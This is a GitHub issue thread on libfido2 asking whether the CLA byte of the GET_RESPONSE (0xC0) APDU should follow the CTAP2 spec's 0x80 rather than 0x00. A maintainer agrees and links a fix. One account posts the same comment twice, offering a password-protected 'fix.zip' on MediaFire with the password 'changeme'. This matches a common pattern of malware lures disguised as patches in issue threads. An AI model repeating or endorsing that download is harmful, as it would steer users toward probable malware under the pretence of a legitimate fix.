### ISSUE TITLE
Should the CLA of GET_RESPONSE(0xC0) command still be 0x00 for ctap2 case?

### ISSUE THREAD

**Issue by nuno0529** [Yubico/libfido2#816]
libfido2 code here force use 0x00, https://github.com/Yubico/libfido2/blob/main/src/nfc.c#L187
- ctap2 spec examples use 0x80, https://fidoalliance.org/specs/fido-v2.2-rd-20230321/fido-client-to-authenticator-protocol-v2.2-rd-20230321.html#nfc-fragmentation
- u2f spec examples use 0x00, https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-nfc-protocol-v1.2-ps-20170411.html#apdu-length

As ISO7816-4, the CLA of GET_RESPONSE(0xC0) command is not fixed to 0x00, https://cardwerk.com/smart-card-standard-iso7816-4-section-7-transmission-interindustry-commands/

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kongeo** [comment]
Hi @nuno0529,
thanks for bringing this up. Yes I think that makes sense. We will merge a fix as soon as possible.

**Comment by kongeo** [comment]
addressed in https://github.com/Yubico/libfido2/pull/817
